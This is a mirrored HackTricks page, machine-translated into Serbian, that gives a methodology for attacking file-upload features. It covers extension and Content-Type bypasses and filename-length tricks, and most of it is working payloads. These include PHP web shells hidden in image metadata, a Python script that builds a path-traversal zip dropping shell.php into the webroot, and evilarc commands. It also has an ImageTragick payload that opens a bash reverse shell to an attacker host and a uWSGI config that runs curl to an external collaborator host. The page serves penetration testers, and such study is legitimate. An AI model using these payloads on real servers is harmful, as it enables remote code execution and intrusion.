mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 14:40:37 +00:00

History

Translator 7f5ef947ac Translated ['README.md', 'binary-exploitation/format-strings/README.md',		2024-04-15 03:57:54 +00:00
..
pdf-upload-xxe-and-cors-bypass.md	Translated to Serbian	2024-02-10 13:11:20 +00:00
README.md	Translated ['README.md', 'binary-exploitation/format-strings/README.md',	2024-04-15 03:57:54 +00:00

README.md

Postavljanje datoteka

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Ako ste zainteresovani za hakersku karijeru i hakovanje neuhvatljivog - mi zapošljavamo! (potrebno je tečno poznavanje poljskog jezika u pisanju i govoru).

{% embed url="https://www.stmcyber.com/careers" %}

Opšta metodologija postavljanja datoteka

Drugi korisni nastavci:

PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
Rad u PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws

Zaobilaženje provere ekstenzija datoteka

Ako se primenjuju, proverite prethodne ekstenzije. Takođe ih testirajte koristeći neka velika slova: pHp, .pHP5, .PhAr ...
Proverite dodavanjem validne ekstenzije pre ekstenzije izvršenja (koristite i prethodne ekstenzije):

file.png.php
file.png.Php5

Pokušajte dodavanjem specijalnih karaktera na kraju. Možete koristiti Burp da bruteforce sve ascii i Unicode karaktere. (Imajte na umu da možete pokušati koristiti prethodno pomenute ekstenzije)

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....

Pokušajte da zaobiđete zaštitu prevareći parser ekstenzija na serverskoj strani tehnikama poput udvajanja ekstenzije ili dodavanja smeća (nultih bajtova) između ekstenzija. Takođe možete koristiti prethodne ekstenzije da biste pripremili bolji payload.

file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png

Dodajte još jedan sloj ekstenzija prethodnoj proveri:

file.png.jpg.php
file.php%00.png%00.jpg

Pokušajte da stavite izvršnu ekstenziju pre validne ekstenzije i nadajte se da je server loše konfigurisan. (korisno za iskorišćavanje Apache konfiguracija gde će bilo šta sa ekstenzijom** .php, ali ne nužno završava u .php** izvršiti kod):

npr: file.php.png

Korišćenje NTFS alternativnog toka podataka (ADS) u Windows-u. U ovom slučaju, karakter „:“ će biti ubačen posle zabranjene ekstenzije i pre dozvoljene. Kao rezultat, na serveru će biti kreirana prazna datoteka sa zabranjenom ekstenzijom (npr. “file.asax:.jpg”). Ova datoteka može biti kasnije izmenjena korišćenjem drugih tehnika kao što je korišćenje njenog kratkog imena. Obrazac “::$data” takođe može biti korišćen za kreiranje nepraznih datoteka. Stoga, dodavanje tačka karaktera posle ovog obrasca takođe može biti korisno za zaobilaženje daljih restrikcija (npr. “file.asp::$data.”)
Pokušajte da pređete granice imena datoteke. Validna ekstenzija se odseče. A zlonamerni PHP ostaje. AAA<--SNIP-->AAA.php

# Linux maksimum 255 bajtova
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # oduzeti 4 ovde i dodati .png
# Postavite datoteku i proverite odgovor koliko karaktera dozvoljava. Recimo 236
python -c 'print "A" * 232'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Napravite payload
AAA<--SNIP 232 A-->AAA.php.png

Bypassovanje Content-Type, Magic Number, Compression & Resizing

Bypass Content-Type provere postavljanjem vrednosti zaglavlja Content-Type na: image/png , text/plain , application/octet-stream

Content-Type wordlist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt

Bypass magic number provere dodavanjem na početak fajla bajtova prave slike (zbunite file komandu). Ili uvedite shell unutar metapodataka:
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
\ ili takođe možete ubaciti payload direktno u sliku:
echo '<?php system($_REQUEST['cmd']); ?>' >> img.png
Ako se kompresija dodaje vašoj slici, na primer korišćenjem standardnih PHP biblioteka poput PHP-GD, prethodne tehnike neće biti korisne. Međutim, možete koristiti PLTE chunk tehnika definisana ovde da ubacite neki tekst koji će preživeti kompresiju.
Github sa kodom
Web stranica takođe može resajzovati sliku, koristeći na primer PHP-GD funkcije imagecopyresized ili imagecopyresampled. Međutim, možete koristiti IDAT chunk tehnika definisana ovde da ubacite neki tekst koji će preživeti kompresiju.
Github sa kodom
Još jedna tehnika za pravljenje payloada koji preživljava resajzovanje slike, koristeći PHP-GD funkciju thumbnailImage. Međutim, možete koristiti tEXt chunk tehnika definisana ovde da ubacite neki tekst koji će preživeti kompresiju.
Github sa kodom

Ostali Trikovi za Proveru

Pronađite ranjivost da preimenujete već uploadovan fajl (da promenite ekstenziju).
Pronađite ranjivost Local File Inclusion da izvršite backdoor.
Moguće otkrivanje informacija:

Uploadujte više puta (i istovremeno) isti fajl sa istim imenom
Uploadujte fajl sa imenom fajla ili foldera koji već postoji
Uploadujte fajl sa “.”, “..”, ili “…” kao njegovo ime. Na primer, u Apache-u na Windows-u, ako aplikacija čuva uploadovane fajlove u direktorijumu “/www/uploads/”, ime “.” će kreirati fajl nazvan “uploads” u direktorijumu “/www/”.
Uploadujte fajl koji se možda ne može lako obrisati kao što je “…:.jpg” u NTFS-u. (Windows)
Uploadujte fajl u Windows-u sa nevažećim karakterima poput |<>*?” u njegovom imenu. (Windows)
Uploadujte fajl u Windows-u koristeći rezervisana (zabranjena) imena poput CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, i LPT9.

Pokušajte takođe da uploadujete izvršni (.exe) ili .html (manje sumnjivo) koji će izvršiti kod kada ga slučajno otvori žrtva.

Specijalni trikovi sa ekstenzijama

Ako pokušavate da uploadujete fajlove na PHP server, pogledajte .htaccess trik za izvršavanje koda.
Ako pokušavate da uploadujete fajlove na ASP server, pogledajte .config trik za izvršavanje koda.

.phar fajlovi su kao .jar za javu, ali za php, i mogu se koristiti kao php fajl (izvršavanje sa php-om, ili uključivanje u skriptu...)

Ekstenzija .inc se ponekad koristi za php fajlove koji se koriste samo za uvoz fajlova, tako da je u nekom trenutku neko mogao dozvoliti ovu ekstenziju da se izvrši.

Jetty RCE

Ako možete da uploadujete XML fajl na Jetty server, možete dobiti RCE jer se novi *.xml i *.war automatski procesuiraju. Dakle, kao što je navedeno na sledećoj slici, uploadujte XML fajl u $JETTY_BASE/webapps/ i očekujte shell!

uWSGI RCE

Za detaljno istraživanje ove ranjivosti pogledajte originalno istraživanje: uWSGI RCE Exploitation.

Ranjivosti za izvršavanje udaljenih komandi (RCE) mogu biti iskorišćene na uWSGI serverima ako imate mogućnost da izmenite .ini konfiguracioni fajl. uWSGI konfiguracioni fajlovi koriste specifičnu sintaksu za uključivanje "magičnih" promenljivih, mesta i operatora. Posebno, operator '@', korišćen kao @(filename), dizajniran je da uključi sadržaj fajla. Među različitim podržanim šemama u uWSGI-ju, "exec" šema je posebno moćna, omogućavajući čitanje podataka iz standardnog izlaza procesa. Ova funkcionalnost može biti manipulisana u zlonamerne svrhe kao što su Izvršavanje udaljenih komandi ili Pisanje/Čitanje proizvoljnih fajlova kada se .ini konfiguracioni fajl procesuira.

Razmotrite sledeći primer štetnog uwsgi.ini fajla, prikazujući različite šeme:

[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; curl to exfil via collaborator
extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)

Izvršenje payload-a se dešava tokom parsiranja konfiguracionog fajla. Da bi konfiguracija bila aktivirana i parsirana, proces uWSGI mora biti ili restartovan (potencijalno nakon pada ili zbog napada uskraćivanjem usluge) ili fajl mora biti podešen za automatsko ponovno učitavanje. Funkcija automatskog ponovnog učitavanja, ako je omogućena, ponovo učitava fajl u određenim intervalima nakon što detektuje promene.

Važno je razumeti opuštenu prirodu parsiranja konfiguracionog fajla uWSGI-ja. Konkretno, razmatrani payload može biti ubačen u binarni fajl (kao što je slika ili PDF), što dodatno proširuje obim potencijalne eksploatacije.

wget Trik za otpremanje fajlova/SSRF Trik

U nekim situacijama možete primetiti da server koristi wget za preuzimanje fajlova i možete navesti URL. U tim slučajevima, kod može proveravati da li je ekstenzija preuzetih fajlova unutar bele liste kako bi se osiguralo da će biti preuzimani samo dozvoljeni fajlovi. Međutim, ova provera može biti zaobiđena.
Maksimalna dužina imenovanja fajla u Linuxu je 255, međutim, wget skraćuje imena fajlova na 236 karaktera. Možete preuzeti fajl nazvan "A"*232+".php"+".gif", ovo ime fajla će zaobići proveru (kao u ovom primeru ".gif" je validna ekstenzija) ali će wget preimenovati fajl u "A"*232+".php".

#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080

#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>]      10  --.-KB/s    in 0s

2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]

Imajte na umu da je još jedna opcija o kojoj možete razmišljati da zaobiđete ovu proveru je da naterate HTTP server da preusmeri na drugi fajl, tako da će početni URL zaobići proveru, a zatim će wget preuzeti preusmereni fajl sa novim imenom. Ovo neće raditi osim ako se wget koristi sa parametrom --trust-server-names jer će wget preuzeti preusmerenu stranicu sa imenom fajla naznačenim u originalnom URL-u.

Alati

Upload Bypass je moćan alat dizajniran da pomogne Pentesterima i Bug Hunterima u testiranju mehanizama za otpremanje fajlova. Koristi različite tehnike nagradnih bagova kako bi pojednostavio proces identifikacije i iskorišćavanja ranjivosti, obezbeđujući temeljnu procenu veb aplikacija.

Od otpremanja fajla do drugih ranjivosti

Postavite ime fajla na ../../../tmp/lol.png i pokušajte da postignete traversiranje putanje
Postavite ime fajla na sleep(10)-- -.jpg i možda ćete moći da postignete SQL injection
Postavite ime fajla na <svg onload=alert(document.domain)> da biste postigli XSS
Postavite ime fajla na ; sleep 10; da biste testirali neke injekcije komandi (više tričarija za injekciju komandi ovde)
XSS u fajlu sa slikom (svg)
JS fajl otpremanje + XSS = Eksploatacija radnika usluge
XXE u otpremanju svg fajla
Otvoreno preusmeravanje putem otpremanja svg fajla
Isprobajte različite svg payload-e sa https://github.com/allanlw/svg-cheatsheet****
Čuvena ranjivost ImageTrick
Ako možete ukazati veb serveru da uhvati sliku sa URL-a možete pokušati da iskoristite SSRF. Ako će se ova slika sačuvati na nekom javnom sajtu, takođe možete ukazati na URL sa https://iplogger.org/invisible/ i ukrasti informacije o svakom posetiocu.
XXE i CORS zaobilaženje sa otpremanjem PDF-Adobe-a
Posebno oblikovani PDF-ovi za XSS: Sledeća stranica prikazuje kako ubaciti PDF podatke da biste dobili izvršenje JS. Ako možete otpremiti PDF-ove, možete pripremiti neki PDF koji će izvršiti proizvoljni JS prateći date upute.
Otpremite [eicar](https://secure.eicar.org/eicar.com.txt) sadržaj da proverite da li server ima neki antivirus
Proverite da li postoji neko ograničenje veličine prilikom otpremanja fajlova

Evo top 10 lista stvari koje možete postići otpremanjem (sa ovde):

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Otvoreno preusmeravanje
PNG / JPEG: Napad poplavom piksela (DoS)
ZIP: RCE putem LFI / DoS
PDF / PPTX: SSRF / BLIND XXE

Burp Ekstenzija

{% embed url="https://github.com/portswigger/upload-scanner" %}

Čarobni bajtovi zaglavlja

PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
JPG: "\xff\xd8\xff"

Pogledajte https://en.wikipedia.org/wiki/List_of_file_signatures za druge tipove fajlova.

Zip/Tar Fajl Automatski dekompresovan prilikom otpremanja

Ako možete otpremiti ZIP koji će biti dekompresovan unutar servera, možete uraditi 2 stvari:

Simbolička veza

Otpremite link koji sadrži softverske veze ka drugim fajlovima, zatim, pristupajući dekompresovanim fajlovima, pristupićete povezanim fajlovima:

ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt

Dekompresujte u različite fascikle

Neočekivano stvaranje fajlova u direktorijumima tokom dekompresije predstavlja značajan problem. Uprkos početnim pretpostavkama da ovaj postupak može zaštititi od izvršavanja komandi na nivou OS putem zlonamernih uploadovanih fajlova, hijerarhijska podrška za kompresiju i mogućnosti pretrage direktorijuma ZIP arhivnog formata mogu biti iskorišćene. Ovo omogućava napadačima da zaobiđu restrikcije i pobegnu iz bezbednih direktorijuma za uploadovanje manipulišući funkcionalnostima dekompresije ciljne aplikacije.

Automatizovani eksploit za kreiranje takvih fajlova dostupan je na evilarc na GitHub-u. Ova alatka može biti korišćena na sledeći način:

# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php

Dodatno, symlink trik sa evilarc-om je opcija. Ako je cilj da se cilja datoteka poput /flag.txt, treba napraviti symlink ka toj datoteci na vašem sistemu. Ovo osigurava da evilarc ne naiđe na greške tokom svog rada.

Ispod je primer Python koda koji se koristi za kreiranje zlonamernog zip fajla:

#!/usr/bin/python
import zipfile
from io import BytesIO

def create_zip():
f = BytesIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()

create_zip()

Zloupotreba kompresije za prskanje fajlova

Za dodatne detalje proverite originalni post na: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

Kreiranje PHP Shell-a: PHP kod je napisan da izvrši komande prosleđene kroz promenljivu $_REQUEST.

<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>

Prskanje Fajlova i Kreiranje Kompresovanog Fajla: Kreiraju se više fajlova i formira se zip arhiva koja sadrži ove fajlove.

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php

Modifikacija pomoću Hex Editora ili vi: Imena fajlova unutar zip arhive se menjaju korišćenjem vi ili hex editora, menjajući "xxA" u "../" kako bi se pretraživali direktorijumi.

:set modifiable
:%s/xxA/..\//g
:x!

ImageTragic

Otpremite ovaj sadržaj sa ekstenzijom slike da iskoristite ranjivost (ImageMagick, 7.0.1-1) (iz exploita)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Ugrađivanje PHP Shell-a u PNG

Ugrađivanje PHP Shell-a u IDAT blok PNG datoteke može efikasno zaobići određene operacije obrade slika. Funkcije imagecopyresized i imagecopyresampled iz PHP-GD su posebno relevantne u ovom kontekstu, jer se često koriste za promenu veličine i uzorkovanje slika, redom. Mogućnost ugrađenog PHP Shell-a da ostane neizmenjen nakon ovih operacija predstavlja značajnu prednost za određene slučajeve upotrebe.

Detaljno istraživanje ove tehnike, uključujući metodologiju i potencijalne primene, pruženo je u sledećem članku: "Kodiranje Web Shell-ova u PNG IDAT blokovima". Ovaj resurs nudi sveobuhvatno razumevanje procesa i njegovih implikacija.

Više informacija na: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Poliglotne Datoteke

Poliglotne datoteke služe kao jedinstveno sredstvo u kibernetičkoj bezbednosti, delujući kao kameleoni koji mogu validno postojati u više formata datoteka istovremeno. Zanimljiv primer je GIFAR, hibrid koji funkcioniše kao GIF i RAR arhiva istovremeno. Takve datoteke nisu ograničene samo na ovu kombinaciju; kombinacije poput GIF i JS ili PPT i JS su takođe izvodljive.

Osnovna korist poliglotnih datoteka leži u njihovoj sposobnosti da zaobiđu sigurnosne mere koje filtriraju datoteke na osnovu tipa. Uobičajena praksa u različitim aplikacijama podrazumeva dozvoljavanje samo određenih tipova datoteka za otpremanje - poput JPEG-a, GIF-a ili DOC-a - kako bi se umanjio rizik od potencijalno štetnih formata (npr. JS, PHP ili Phar datoteke). Međutim, poliglot, pridržavajući se strukturnih kriterijuma više tipova datoteka, može prikriveno zaobići ove restrikcije.

Iako su poligloti prilagodljivi, nailaze na određena ograničenja. Na primer, iako poliglot može istovremeno predstavljati PHAR datoteku (PHp ARhiva) i JPEG, uspeh njenog otpremanja može zavisiti od politike ekstenzija datoteka platforme. Ako sistem strogo pridržava dozvoljene ekstenzije, sama strukturalna dvojnost poliglota možda neće biti dovoljna da garantuje njeno otpremanje.

Više informacija na: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Reference

Ako ste zainteresovani za hakersku karijeru i hakovanje neuhvatljivog - zapošljavamo! (potrebno je tečno poznavanje poljskog jezika u pisanju i govoru).